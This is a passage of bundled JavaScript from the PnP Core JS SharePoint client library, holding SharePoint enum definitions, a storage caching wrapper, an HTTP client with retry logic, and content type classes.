string[] of resolved login names to which this item will be shared * @param role The role (View | Edit) applied to the share * @param shareEverything Share everything in this folder, even items with unique permissions. * @param requireSignin If true the user must signin to view link, otherwise anyone with the link can access the resource * @param emailData Optional, if inlucded an email will be sent. Note subject currently has no effect. */ QueryableShareableFolder.prototype.shareWith = function (loginNames, role, requireSignin, shareEverything, emailData) { if (role === void 0) { role = types_1.SharingRole.View; } if (requireSignin === void 0) { requireSignin = true; } if (shareEverything === void 0) { shareEverything = false; } var dependency = this.addBatchDependency(); return this.getShareable().then(function (shareable) { dependency(); return shareable.shareWith(loginNames, role, requireSignin, shareEverything, emailData); }); }; return QueryableShareableFolder; }(FileFolderShared)); exports.QueryableShareableFolder = QueryableShareableFolder; /***/ }), /* 13 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; // reference: https://msdn.microsoft.com/en-us/library/office/dn600183.aspx Object.defineProperty(exports, "__esModule", { value: true }); /** * Determines the display mode of the given control or view */ var ControlMode; (function (ControlMode) { ControlMode[ControlMode["Display"] = 1] = "Display"; ControlMode[ControlMode["Edit"] = 2] = "Edit"; ControlMode[ControlMode["New"] = 3] = "New"; })(ControlMode = exports.ControlMode || (exports.ControlMode = {})); /** * Specifies the type of the field. */ var FieldTypes; (function (FieldTypes) { FieldTypes[FieldTypes["Invalid"] = 0] = "Invalid"; FieldTypes[FieldTypes["Integer"] = 1] = "Integer"; FieldTypes[FieldTypes["Text"] = 2] = "Text"; FieldTypes[FieldTypes["Note"] = 3] = "Note"; FieldTypes[FieldTypes["DateTime"] = 4] = "DateTime"; FieldTypes[FieldTypes["Counter"] = 5] = "Counter"; FieldTypes[FieldTypes["Choice"] = 6] = "Choice"; FieldTypes[FieldTypes["Lookup"] = 7] = "Lookup"; FieldTypes[FieldTypes["Boolean"] = 8] = "Boolean"; FieldTypes[FieldTypes["Number"] = 9] = "Number"; FieldTypes[FieldTypes["Currency"] = 10] = "Currency"; FieldTypes[FieldTypes["URL"] = 11] = "URL"; FieldTypes[FieldTypes["Computed"] = 12] = "Computed"; FieldTypes[FieldTypes["Threading"] = 13] = "Threading"; FieldTypes[FieldTypes["Guid"] = 14] = "Guid"; FieldTypes[FieldTypes["MultiChoice"] = 15] = "MultiChoice"; FieldTypes[FieldTypes["GridChoice"] = 16] = "GridChoice"; FieldTypes[FieldTypes["Calculated"] = 17] = "Calculated"; FieldTypes[FieldTypes["File"] = 18] = "File"; FieldTypes[FieldTypes["Attachments"] = 19] = "Attachments"; FieldTypes[FieldTypes["User"] = 20] = "User"; FieldTypes[FieldTypes["Recurrence"] = 21] = "Recurrence"; FieldTypes[FieldTypes["CrossProjectLink"] = 22] = "CrossProjectLink"; FieldTypes[FieldTypes["ModStat"] = 23] = "ModStat"; FieldTypes[FieldTypes["Error"] = 24] = "Error"; FieldTypes[FieldTypes["ContentTypeId"] = 25] = "ContentTypeId"; FieldTypes[FieldTypes["PageSeparator"] = 26] = "PageSeparator"; FieldTypes[FieldTypes["ThreadIndex"] = 27] = "ThreadIndex"; FieldTypes[FieldTypes["WorkflowStatus"] = 28] = "WorkflowStatus"; FieldTypes[FieldTypes["AllDayEvent"] = 29] = "AllDayEvent"; FieldTypes[FieldTypes["WorkflowEventType"] = 30] = "WorkflowEventType"; })(FieldTypes = exports.FieldTypes || (exports.FieldTypes = {})); var DateTimeFieldFormatType; (function (DateTimeFieldFormatType) { DateTimeFieldFormatType[DateTimeFieldFormatType["DateOnly"] = 0] = "DateOnly"; DateTimeFieldFormatType[DateTimeFieldFormatType["DateTime"] = 1] = "DateTime"; })(DateTimeFieldFormatType = exports.DateTimeFieldFormatType || (exports.DateTimeFieldFormatType = {})); /** * Specifies the control settings while adding a field. */ var AddFieldOptions; (function (AddFieldOptions) { /** * Specify that a new field added to the list must also be added to the default content type in the site collection */ AddFieldOptions[AddFieldOptions["DefaultValue"] = 0] = "DefaultValue"; /** * Specify that a new field added to the list must also be added to the default content type in the site collection. */ AddFieldOptions[AddFieldOptions["AddToDefaultContentType"] = 1] = "AddToDefaultContentType"; /** * Specify that a new field must not be added to any other content type */ AddFieldOptions[AddFieldOptions["AddToNoContentType"] = 2] = "AddToNoContentType"; /** * Specify that a new field that is added to the specified list must also be added to all content types in the site collection */ AddFieldOptions[AddFieldOptions["AddToAllContentTypes"] = 4] = "AddToAllContentTypes"; /** * Specify adding an internal field name hint for the purpose of avoiding possible database locking or field renaming operations */ AddFieldOptions[AddFieldOptions["AddFieldInternalNameHint"] = 8] = "AddFieldInternalNameHint"; /** * Specify that a new field that is added to the specified list must also be added to the default list view */ AddFieldOptions[AddFieldOptions["AddFieldToDefaultView"] = 16] = "AddFieldToDefaultView"; /** * Specify to confirm that no other field has the same display name */ AddFieldOptions[AddFieldOptions["AddFieldCheckDisplayName"] = 32] = "AddFieldCheckDisplayName"; })(AddFieldOptions = exports.AddFieldOptions || (exports.AddFieldOptions = {})); var CalendarType; (function (CalendarType) { CalendarType[CalendarType["Gregorian"] = 1] = "Gregorian"; CalendarType[CalendarType["Japan"] = 3] = "Japan"; CalendarType[CalendarType["Taiwan"] = 4] = "Taiwan"; CalendarType[CalendarType["Korea"] = 5] = "Korea"; CalendarType[CalendarType["Hijri"] = 6] = "Hijri"; CalendarType[CalendarType["Thai"] = 7] = "Thai"; CalendarType[CalendarType["Hebrew"] = 8] = "Hebrew"; CalendarType[CalendarType["GregorianMEFrench"] = 9] = "GregorianMEFrench"; CalendarType[CalendarType["GregorianArabic"] = 10] = "GregorianArabic"; CalendarType[CalendarType["GregorianXLITEnglish"] = 11] = "GregorianXLITEnglish"; CalendarType[CalendarType["GregorianXLITFrench"] = 12] = "GregorianXLITFrench"; CalendarType[CalendarType["KoreaJapanLunar"] = 14] = "KoreaJapanLunar"; CalendarType[CalendarType["ChineseLunar"] = 15] = "ChineseLunar"; CalendarType[CalendarType["SakaEra"] = 16] = "SakaEra"; CalendarType[CalendarType["UmAlQura"] = 23] = "UmAlQura"; })(CalendarType = exports.CalendarType || (exports.CalendarType = {})); var UrlFieldFormatType; (function (UrlFieldFormatType) { UrlFieldFormatType[UrlFieldFormatType["Hyperlink"] = 0] = "Hyperlink"; UrlFieldFormatType[UrlFieldFormatType["Image"] = 1] = "Image"; })(UrlFieldFormatType = exports.UrlFieldFormatType || (exports.UrlFieldFormatType = {})); var PermissionKind; (function (PermissionKind) { /** * Has no permissions on the Site. Not available through the user interface. */ PermissionKind[PermissionKind["EmptyMask"] = 0] = "EmptyMask"; /** * View items in lists, documents in document libraries, and Web discussion comments. */ PermissionKind[PermissionKind["ViewListItems"] = 1] = "ViewListItems"; /** * Add items to lists, documents to document libraries, and Web discussion comments. */ PermissionKind[PermissionKind["AddListItems"] = 2] = "AddListItems"; /** * Edit items in lists, edit documents in document libraries, edit Web discussion comments * in documents, and customize Web Part Pages in document libraries. */ PermissionKind[PermissionKind["EditListItems"] = 3] = "EditListItems"; /** * Delete items from a list, documents from a document library, and Web discussion * comments in documents. */ PermissionKind[PermissionKind["DeleteListItems"] = 4] = "DeleteListItems"; /** * Approve a minor version of a list item or document. */ PermissionKind[PermissionKind["ApproveItems"] = 5] = "ApproveItems"; /** * View the source of documents with server-side file handlers. */ PermissionKind[PermissionKind["OpenItems"] = 6] = "OpenItems"; /** * View past versions of a list item or document. */ PermissionKind[PermissionKind["ViewVersions"] = 7] = "ViewVersions"; /** * Delete past versions of a list item or document. */ PermissionKind[PermissionKind["DeleteVersions"] = 8] = "DeleteVersions"; /** * Discard or check in a document which is checked out to another user. */ PermissionKind[PermissionKind["CancelCheckout"] = 9] = "CancelCheckout"; /** * Create, change, and delete personal views of lists. */ PermissionKind[PermissionKind["ManagePersonalViews"] = 10] = "ManagePersonalViews"; /** * Create and delete lists, add or remove columns in a list, and add or remove public views of a list. */ PermissionKind[PermissionKind["ManageLists"] = 12] = "ManageLists"; /** * View forms, views, and application pages, and enumerate lists. */ PermissionKind[PermissionKind["ViewFormPages"] = 13] = "ViewFormPages"; /** * Make content of a list or document library retrieveable for anonymous users through SharePoint search. * The list permissions in the site do not change. */ PermissionKind[PermissionKind["AnonymousSearchAccessList"] = 14] = "AnonymousSearchAccessList"; /** * Allow users to open a Site, list, or folder to access items inside that container. */ PermissionKind[PermissionKind["Open"] = 17] = "Open"; /** * View pages in a Site. */ PermissionKind[PermissionKind["ViewPages"] = 18] = "ViewPages"; /** * Add, change, or delete HTML pages or Web Part Pages, and edit the Site using * a Windows SharePoint Services compatible editor. */ PermissionKind[PermissionKind["AddAndCustomizePages"] = 19] = "AddAndCustomizePages"; /** * Apply a theme or borders to the entire Site. */ PermissionKind[PermissionKind["ApplyThemeAndBorder"] = 20] = "ApplyThemeAndBorder"; /** * Apply a style sheet (.css file) to the Site. */ PermissionKind[PermissionKind["ApplyStyleSheets"] = 21] = "ApplyStyleSheets"; /** * View reports on Site usage. */ PermissionKind[PermissionKind["ViewUsageData"] = 22] = "ViewUsageData"; /** * Create a Site using Self-Service Site Creation. */ PermissionKind[PermissionKind["CreateSSCSite"] = 23] = "CreateSSCSite"; /** * Create subsites such as team sites, Meeting Workspace sites, and Document Workspace sites. */ PermissionKind[PermissionKind["ManageSubwebs"] = 24] = "ManageSubwebs"; /** * Create a group of users that can be used anywhere within the site collection. */ PermissionKind[PermissionKind["CreateGroups"] = 25] = "CreateGroups"; /** * Create and change permission levels on the Site and assign permissions to users * and groups. */ PermissionKind[PermissionKind["ManagePermissions"] = 26] = "ManagePermissions"; /** * Enumerate files and folders in a Site using Microsoft Office SharePoint Designer * and WebDAV interfaces. */ PermissionKind[PermissionKind["BrowseDirectories"] = 27] = "BrowseDirectories"; /** * View information about users of the Site. */ PermissionKind[PermissionKind["BrowseUserInfo"] = 28] = "BrowseUserInfo"; /** * Add or remove personal Web Parts on a Web Part Page. */ PermissionKind[PermissionKind["AddDelPrivateWebParts"] = 29] = "AddDelPrivateWebParts"; /** * Update Web Parts to display personalized information. */ PermissionKind[PermissionKind["UpdatePersonalWebParts"] = 30] = "UpdatePersonalWebParts"; /** * Grant the ability to perform all administration tasks for the Site as well as * manage content, activate, deactivate, or edit properties of Site scoped Features * through the object model or through the user interface (UI). When granted on the * root Site of a Site Collection, activate, deactivate, or edit properties of * site collection scoped Features through the object model. To browse to the Site * Collection Features page and activate or deactivate Site Collection scoped Features * through the UI, you must be a Site Collection administrator. */ PermissionKind[PermissionKind["ManageWeb"] = 31] = "ManageWeb"; /** * Content of lists and document libraries in the Web site will be retrieveable for anonymous users through * SharePoint search if the list or document library has AnonymousSearchAccessList set. */ PermissionKind[PermissionKind["AnonymousSearchAccessWebLists"] = 32] = "AnonymousSearchAccessWebLists"; /** * Use features that launch client applications. Otherwise, users must work on documents * locally and upload changes. */ PermissionKind[PermissionKind["UseClientIntegration"] = 37] = "UseClientIntegration"; /** * Use SOAP, WebDAV, or Microsoft Office SharePoint Designer interfaces to access the Site. */ PermissionKind[PermissionKind["UseRemoteAPIs"] = 38] = "UseRemoteAPIs"; /** * Manage alerts for all users of the Site. */ PermissionKind[PermissionKind["ManageAlerts"] = 39] = "ManageAlerts"; /** * Create e-mail alerts. */ PermissionKind[PermissionKind["CreateAlerts"] = 40] = "CreateAlerts"; /** * Allows a user to change his or her user information, such as adding a picture. */ PermissionKind[PermissionKind["EditMyUserInfo"] = 41] = "EditMyUserInfo"; /** * Enumerate permissions on Site, list, folder, document, or list item. */ PermissionKind[PermissionKind["EnumeratePermissions"] = 63] = "EnumeratePermissions"; /** * Has all permissions on the Site. Not available through the user interface. */ PermissionKind[PermissionKind["FullMask"] = 65] = "FullMask"; })(PermissionKind = exports.PermissionKind || (exports.PermissionKind = {})); var PrincipalType; (function (PrincipalType) { PrincipalType[PrincipalType["None"] = 0] = "None"; PrincipalType[PrincipalType["User"] = 1] = "User"; PrincipalType[PrincipalType["DistributionList"] = 2] = "DistributionList"; PrincipalType[PrincipalType["SecurityGroup"] = 4] = "SecurityGroup"; PrincipalType[PrincipalType["SharePointGroup"] = 8] = "SharePointGroup"; PrincipalType[PrincipalType["All"] = 15] = "All"; })(PrincipalType = exports.PrincipalType || (exports.PrincipalType = {})); var PrincipalSource; (function (PrincipalSource) { PrincipalSource[PrincipalSource["None"] = 0] = "None"; PrincipalSource[PrincipalSource["UserInfoList"] = 1] = "UserInfoList"; PrincipalSource[PrincipalSource["Windows"] = 2] = "Windows"; PrincipalSource[PrincipalSource["MembershipProvider"] = 4] = "MembershipProvider"; PrincipalSource[PrincipalSource["RoleProvider"] = 8] = "RoleProvider"; PrincipalSource[PrincipalSource["All"] = 15] = "All"; })(PrincipalSource = exports.PrincipalSource || (exports.PrincipalSource = {})); var RoleType; (function (RoleType) { RoleType[RoleType["None"] = 0] = "None"; RoleType[RoleType["Guest"] = 1] = "Guest"; RoleType[RoleType["Reader"] = 2] = "Reader"; RoleType[RoleType["Contributor"] = 3] = "Contributor"; RoleType[RoleType["WebDesigner"] = 4] = "WebDesigner"; RoleType[RoleType["Administrator"] = 5] = "Administrator"; })(RoleType = exports.RoleType || (exports.RoleType = {})); var PageType; (function (PageType) { PageType[PageType["Invalid"] = -1] = "Invalid"; PageType[PageType["DefaultView"] = 0] = "DefaultView"; PageType[PageType["NormalView"] = 1] = "NormalView"; PageType[PageType["DialogView"] = 2] = "DialogView"; PageType[PageType["View"] = 3] = "View"; PageType[PageType["DisplayForm"] = 4] = "DisplayForm"; PageType[PageType["DisplayFormDialog"] = 5] = "DisplayFormDialog"; PageType[PageType["EditForm"] = 6] = "EditForm"; PageType[PageType["EditFormDialog"] = 7] = "EditFormDialog"; PageType[PageType["NewForm"] = 8] = "NewForm"; PageType[PageType["NewFormDialog"] = 9] = "NewFormDialog"; PageType[PageType["SolutionForm"] = 10] = "SolutionForm"; PageType[PageType["PAGE_MAXITEMS"] = 11] = "PAGE_MAXITEMS"; })(PageType = exports.PageType || (exports.PageType = {})); var SharingLinkKind; (function (SharingLinkKind) { /** * Uninitialized link */ SharingLinkKind[SharingLinkKind["Uninitialized"] = 0] = "Uninitialized"; /** * Direct link to the object being shared */ SharingLinkKind[SharingLinkKind["Direct"] = 1] = "Direct"; /** * Organization-shareable link to the object being shared with view permissions */ SharingLinkKind[SharingLinkKind["OrganizationView"] = 2] = "OrganizationView"; /** * Organization-shareable link to the object being shared with edit permissions */ SharingLinkKind[SharingLinkKind["OrganizationEdit"] = 3] = "OrganizationEdit"; /** * View only anonymous link */ SharingLinkKind[SharingLinkKind["AnonymousView"] = 4] = "AnonymousView"; /** * Read/Write anonymous link */ SharingLinkKind[SharingLinkKind["AnonymousEdit"] = 5] = "AnonymousEdit"; /** * Flexible sharing Link where properties can change without affecting link URL */ SharingLinkKind[SharingLinkKind["Flexible"] = 6] = "Flexible"; })(SharingLinkKind = exports.SharingLinkKind || (exports.SharingLinkKind = {})); ; /** * Indicates the role of the sharing link */ var SharingRole; (function (SharingRole) { SharingRole[SharingRole["None"] = 0] = "None"; SharingRole[SharingRole["View"] = 1] = "View"; SharingRole[SharingRole["Edit"] = 2] = "Edit"; SharingRole[SharingRole["Owner"] = 3] = "Owner"; })(SharingRole = exports.SharingRole || (exports.SharingRole = {})); var SharingOperationStatusCode; (function (SharingOperationStatusCode) { /** * The share operation completed without errors. */ SharingOperationStatusCode[SharingOperationStatusCode["CompletedSuccessfully"] = 0] = "CompletedSuccessfully"; /** * The share operation completed and generated requests for access. */ SharingOperationStatusCode[SharingOperationStatusCode["AccessRequestsQueued"] = 1] = "AccessRequestsQueued"; /** * The share operation failed as there were no resolved users. */ SharingOperationStatusCode[SharingOperationStatusCode["NoResolvedUsers"] = -1] = "NoResolvedUsers"; /** * The share operation failed due to insufficient permissions. */ SharingOperationStatusCode[SharingOperationStatusCode["AccessDenied"] = -2] = "AccessDenied"; /** * The share operation failed when attempting a cross site share, which is not supported. */ SharingOperationStatusCode[SharingOperationStatusCode["CrossSiteRequestNotSupported"] = -3] = "CrossSiteRequestNotSupported"; /** * The sharing operation failed due to an unknown error. */ SharingOperationStatusCode[SharingOperationStatusCode["UnknowError"] = -4] = "UnknowError"; /** * The text you typed is too long. Please shorten it. */ SharingOperationStatusCode[SharingOperationStatusCode["EmailBodyTooLong"] = -5] = "EmailBodyTooLong"; /** * The maximum number of unique scopes in the list has been exceeded. */ SharingOperationStatusCode[SharingOperationStatusCode["ListUniqueScopesExceeded"] = -6] = "ListUniqueScopesExceeded"; /** * The share operation failed because a sharing capability is disabled in the site. */ SharingOperationStatusCode[SharingOperationStatusCode["CapabilityDisabled"] = -7] = "CapabilityDisabled"; /** * The specified object for the share operation is not supported. */ SharingOperationStatusCode[SharingOperationStatusCode["ObjectNotSupported"] = -8] = "ObjectNotSupported"; /** * A SharePoint group cannot contain another SharePoint group. */ SharingOperationStatusCode[SharingOperationStatusCode["NestedGroupsNotSupported"] = -9] = "NestedGroupsNotSupported"; })(SharingOperationStatusCode = exports.SharingOperationStatusCode || (exports.SharingOperationStatusCode = {})); var SPSharedObjectType; (function (SPSharedObjectType) { SPSharedObjectType[SPSharedObjectType["Unknown"] = 0] = "Unknown"; SPSharedObjectType[SPSharedObjectType["File"] = 1] = "File"; SPSharedObjectType[SPSharedObjectType["Folder"] = 2] = "Folder"; SPSharedObjectType[SPSharedObjectType["Item"] = 3] = "Item"; SPSharedObjectType[SPSharedObjectType["List"] = 4] = "List"; SPSharedObjectType[SPSharedObjectType["Web"] = 5] = "Web"; SPSharedObjectType[SPSharedObjectType["Max"] = 6] = "Max"; })(SPSharedObjectType = exports.SPSharedObjectType || (exports.SPSharedObjectType = {})); var SharingDomainRestrictionMode; (function (SharingDomainRestrictionMode) { SharingDomainRestrictionMode[SharingDomainRestrictionMode["None"] = 0] = "None"; SharingDomainRestrictionMode[SharingDomainRestrictionMode["AllowList"] = 1] = "AllowList"; SharingDomainRestrictionMode[SharingDomainRestrictionMode["BlockList"] = 2] = "BlockList"; })(SharingDomainRestrictionMode = exports.SharingDomainRestrictionMode || (exports.SharingDomainRestrictionMode = {})); ; /***/ }), /* 14 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var collections_1 = __webpack_require__(6); var pnplibconfig_1 = __webpack_require__(4); /** * A wrapper class to provide a consistent interface to browser based storage * */ var PnPClientStorageWrapper = (function () { /** * Creates a new instance of the PnPClientStorageWrapper class * * @constructor */ function PnPClientStorageWrapper(store, defaultTimeoutMinutes) { this.store = store; this.defaultTimeoutMinutes = defaultTimeoutMinutes; this.defaultTimeoutMinutes = (defaultTimeoutMinutes === void 0) ? -1 : defaultTimeoutMinutes; this.enabled = this.test(); } /** * Get a value from storage, or null if that value does not exist * * @param key The key whose value we want to retrieve */ PnPClientStorageWrapper.prototype.get = function (key) { if (!this.enabled) { return null; } var o = this.store.getItem(key); if (o == null) { return null; } var persistable = JSON.parse(o); if (new Date(persistable.expiration) <= new Date()) { this.delete(key); return null; } else { return persistable.value; } }; /** * Adds a value to the underlying storage * * @param key The key to use when storing the provided value * @param o The value to store * @param expire Optional, if provided the expiration of the item, otherwise the default is used */ PnPClientStorageWrapper.prototype.put = function (key, o, expire) { if (this.enabled) { this.store.setItem(key, this.createPersistable(o, expire)); } }; /** * Deletes a value from the underlying storage * * @param key The key of the pair we want to remove from storage */ PnPClientStorageWrapper.prototype.delete = function (key) { if (this.enabled) { this.store.removeItem(key); } }; /** * Gets an item from the underlying storage, or adds it if it does not exist using the supplied getter function * * @param key The key to use when storing the provided value * @param getter A function which will upon execution provide the desired value * @param expire Optional, if provided the expiration of the item, otherwise the default is used */ PnPClientStorageWrapper.prototype.getOrPut = function (key, getter, expire) { var _this = this; if (!this.enabled) { return getter(); } return new Promise(function (resolve) { var o = _this.get(key); if (o == null) { getter().then(function (d) { _this.put(key, d, expire); resolve(d); }); } else { resolve(o); } }); }; /** * Used to determine if the wrapped storage is available currently */ PnPClientStorageWrapper.prototype.test = function () { var str = "test"; try { this.store.setItem(str, str); this.store.removeItem(str); return true; } catch (e) { return false; } }; /** * Creates the persistable to store */ PnPClientStorageWrapper.prototype.createPersistable = function (o, expire) { if (typeof expire === "undefined") { // ensure we are by default inline with the global library setting var defaultTimeout = pnplibconfig_1.RuntimeConfig.defaultCachingTimeoutSeconds; if (this.defaultTimeoutMinutes > 0) { defaultTimeout = this.defaultTimeoutMinutes * 60; } expire = util_1.Util.dateAdd(new Date(), "second", defaultTimeout); } return JSON.stringify({ expiration: expire, value: o }); }; return PnPClientStorageWrapper; }()); exports.PnPClientStorageWrapper = PnPClientStorageWrapper; /** * A thin implementation of in-memory storage for use in nodejs */ var MemoryStorage = (function () { function MemoryStorage(_store) { if (_store === void 0) { _store = new collections_1.Dictionary(); } this._store = _store; } Object.defineProperty(MemoryStorage.prototype, "length", { get: function () { return this._store.count(); }, enumerable: true, configurable: true }); MemoryStorage.prototype.clear = function () { this._store.clear(); }; MemoryStorage.prototype.getItem = function (key) { return this._store.get(key); }; MemoryStorage.prototype.key = function (index) { return this._store.getKeys()[index]; }; MemoryStorage.prototype.removeItem = function (key) { this._store.remove(key); }; MemoryStorage.prototype.setItem = function (key, data) { this._store.add(key, data); }; return MemoryStorage; }()); /** * A class that will establish wrappers for both local and session storage */ var PnPClientStorage = (function () { /** * Creates a new instance of the PnPClientStorage class * * @constructor */ function PnPClientStorage() { this.local = typeof localStorage !== "undefined" ? new PnPClientStorageWrapper(localStorage) : new PnPClientStorageWrapper(new MemoryStorage()); this.session = typeof sessionStorage !== "undefined" ? new PnPClientStorageWrapper(sessionStorage) : new PnPClientStorageWrapper(new MemoryStorage()); } return PnPClientStorage; }()); exports.PnPClientStorage = PnPClientStorage; /***/ }), /* 15 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; Object.defineProperty(exports, "__esModule", { value: true }); var digestcache_1 = __webpack_require__(38); var util_1 = __webpack_require__(0); var pnplibconfig_1 = __webpack_require__(4); var exceptions_1 = __webpack_require__(3); var HttpClient = (function () { function HttpClient() { this._impl = pnplibconfig_1.RuntimeConfig.fetchClientFactory(); this._digestCache = new digestcache_1.DigestCache(this); } HttpClient.prototype.fetch = function (url, options) { var _this = this; if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { cache: "no-cache", credentials: "same-origin" }, true); var headers = new Headers(); // first we add the global headers so they can be overwritten by any passed in locally to this call this.mergeHeaders(headers, pnplibconfig_1.RuntimeConfig.headers); // second we add the local options so we can overwrite the globals this.mergeHeaders(headers, options.headers); // lastly we apply any default headers we need that may not exist if (!headers.has("Accept")) { headers.append("Accept", "application/json"); } if (!headers.has("Content-Type")) { headers.append("Content-Type", "application/json;odata=verbose;charset=utf-8"); } if (!headers.has("X-ClientService-ClientTag")) { headers.append("X-ClientService-ClientTag", "PnPCoreJS:2.0.6-beta.1"); } opts = util_1.Util.extend(opts, { headers: headers }); if (opts.method && opts.method.toUpperCase() !== "GET") { if (!headers.has("X-RequestDigest")) { var index = url.indexOf("_api/"); if (index < 0) { throw new exceptions_1.APIUrlException(); } var webUrl = url.substr(0, index); return this._digestCache.getDigest(webUrl) .then(function (digest) { headers.append("X-RequestDigest", digest); return _this.fetchRaw(url, opts); }); } } return this.fetchRaw(url, opts); }; HttpClient.prototype.fetchRaw = function (url, options) { var _this = this; if (options === void 0) { options = {}; } // here we need to normalize the headers var rawHeaders = new Headers(); this.mergeHeaders(rawHeaders, options.headers); options = util_1.Util.extend(options, { headers: rawHeaders }); var retry = function (ctx) { _this._impl.fetch(url, options).then(function (response) { return ctx.resolve(response); }).catch(function (response) { // grab our current delay var delay = ctx.delay; // Check if request was throttled - http status code 429 // Check is request failed due to server unavailable - http status code 503 if (response.status !== 429 && response.status !== 503) { ctx.reject(response); } // Increment our counters. ctx.delay *= 2; ctx.attempts++; // If we have exceeded the retry count, reject. if (ctx.retryCount <= ctx.attempts) { ctx.reject(response); } // Set our retry timeout for {delay} milliseconds. setTimeout(util_1.Util.getCtxCallback(_this, retry, ctx), delay); }); }; return new Promise(function (resolve, reject) { var retryContext = { attempts: 0, delay: 100, reject: reject, resolve: resolve, retryCount: 7, }; retry.call(_this, retryContext); }); }; HttpClient.prototype.get = function (url, options) { if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { method: "GET" }); return this.fetch(url, opts); }; HttpClient.prototype.post = function (url, options) { if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { method: "POST" }); return this.fetch(url, opts); }; HttpClient.prototype.patch = function (url, options) { if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { method: "PATCH" }); return this.fetch(url, opts); }; HttpClient.prototype.delete = function (url, options) { if (options === void 0) { options = {}; } var opts = util_1.Util.extend(options, { method: "DELETE" }); return this.fetch(url, opts); }; HttpClient.prototype.mergeHeaders = function (target, source) { if (typeof source !== "undefined" && source !== null) { var temp = new Request("", { headers: source }); temp.headers.forEach(function (value, name) { target.append(name, value); }); } }; return HttpClient; }()); exports.HttpClient = HttpClient; ; /***/ }), /* 16 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var util_1 = __webpack_require__(0); var queryable_1 = __webpack_require__(1); /** * Describes a collection of content types * */ var ContentTypes = (function (_super) { __extends(ContentTypes, _super); /** * Creates a new instance of the ContentTypes class * * @param baseUrl The url or Queryable which forms the parent of this content types collection */ function ContentTypes(baseUrl, path) { if (path === void 0) { path = "contenttypes"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a ContentType by content type id */ ContentTypes.prototype.getById = function (id) { var ct = new ContentType(this); ct.concat("('" + id + "')"); return ct; }; /** * Adds an existing contenttype to a content type collection * * @param contentTypeId in the following format, for example: 0x010102 */ ContentTypes.prototype.addAvailableContentType = function (contentTypeId) { var _this = this; var postBody = JSON.stringify({ "contentTypeId": contentTypeId, }); return this.clone(ContentTypes, "addAvailableContentType", true).postAs({ body: postBody }).then(function (data) { return { contentType: _this.getById(data.id), data: data, }; }); }; /** * Adds a new content type to the collection * * @param id The desired content type id for the new content type (also determines the parent content type) * @param name The name of the content type * @param description The description of the content type * @param group The group in which to add the content type * @param additionalSettings Any additional settings to provide when creating the content type * */ ContentTypes.prototype.add = function (id, name, description, group, additionalSettings) { var _this = this; if (description === void 0) { description = ""; } if (group === void 0) { group = "Custom Content Types"; } if (additionalSettings === void 0) { additionalSettings = {}; } var postBody = JSON.stringify(util_1.Util.extend({ "Description": description, "Group": group, "Id": { "StringValue": id }, "Name": name, "__metadata": { "type": "SP.ContentType" }, }, additionalSettings)); return this.post({ body: postBody }).then(function (data) { return { contentType: _this.getById(data.id), data: data }; }); }; return ContentTypes; }(queryable_1.QueryableCollection)); exports.ContentTypes = ContentTypes; /** * Describes a single ContentType instance * */ var ContentType = (function (_super) { __extends(ContentType, _super); function ContentType() { return _super !== null && _super.apply(this, arguments) || this; } Object.defineProperty(ContentType.prototype, "fieldLinks", { /** * Gets the column (also known as field) references in the content type. */ get: function () { return new FieldLinks(this); }, enumerable: true, configurable: true }); Object.defineProperty(ContentType.prototype, "fields", { /** * Gets a value that specifies the collection of fields for the content type. */ get: function () { return new queryable_1.QueryableCollection(this, "fields"); }, enumerable: true, configurable: true }); Object.defineProperty(ContentType.prototype, "parent", { /** * Gets the parent content type of the content type. */ get: function () { return new ContentType(this, "parent"); }, enumerable: true, configurable: true }); Object.defineProperty(ContentType.prototype, "workflowAssociations", { /** * Gets a value that specifies the collection of workflow associations for the content type. */ get: function () { return new queryable_1.QueryableCollection(this, "workflowAssociations"); }, enumerable: true, configurable: true }); /** * Delete this content type */ ContentType.prototype.delete = function () { return this.post({ headers: { "X-HTTP-Method": "DELETE", }, }); }; return ContentType; }(queryable_1.QueryableInstance)); exports.ContentType = ContentType; /** * Represents a collection of field link instances */ var FieldLinks = (function (_super) { __extends(FieldLinks, _super); /** * Creates a new instance of the ContentType class * * @param baseUrl The url or Queryable which forms the parent of this content type instance */ function FieldLinks(baseUrl, path) { if (path === void 0) { path = "fieldlinks"; } return _super.call(this, baseUrl, path) || this; } /** * Gets a FieldLink by GUID id * * @param id The GUID id of the field link */ FieldLinks.prototype.getById = function (id) { var fl = new FieldLink(this); fl.concat("(guid'" + id + "')"); return fl; }; return FieldLinks; }(queryable_1.QueryableCollection)); exports.FieldLinks = FieldLinks; /** * Represents a field link instance */ var FieldLink = (function (_super) { __extends(FieldLink, _super); function FieldLink() { return _super !== null && _super.apply(this, arguments) || this; } return FieldLink; }(queryable_1.QueryableInstance)); exports.FieldLink = FieldLink; /***/ }), /* 17 */ /***/ (function(module, exports, __webpack_require__) { "use strict"; var __extends = (this && this.__extends) || (function () { var extendStatics = Object.setPrototypeOf || ({ __proto__: [] } instanceof Array && function (d, b) { d.__proto__ = b; }) || function (d, b) { for (var p in b) if (b.hasOwnProperty(p)) d[p] = b[p]; }; return function (d, b) { extendStatics(d, b); function __() { this.constructor = d; } d.prototype = b === null ? Object.create(b) : (__.prototype = b.prototype, new __()); }; })(); Object.defineProperty(exports, "__esModule", { value: true }); var queryable_1 = __webpack_require__(1); var sitegroups_1 = __webpack_require__(18); var util_1 = __webpack_require__(0); /** * Describes a set of role assignments for the current scope * */ var RoleAssignments = (function (_super) { __extends(RoleAssignments, _super); /** * Creates a new instance of the RoleAssignments class * * @param baseUrl The url or Queryable which forms the parent of this fields collection */ function RoleAssignments(baseUrl, path) { if (path === void 0) { path = "roleassignments"; } return _super.call(this, 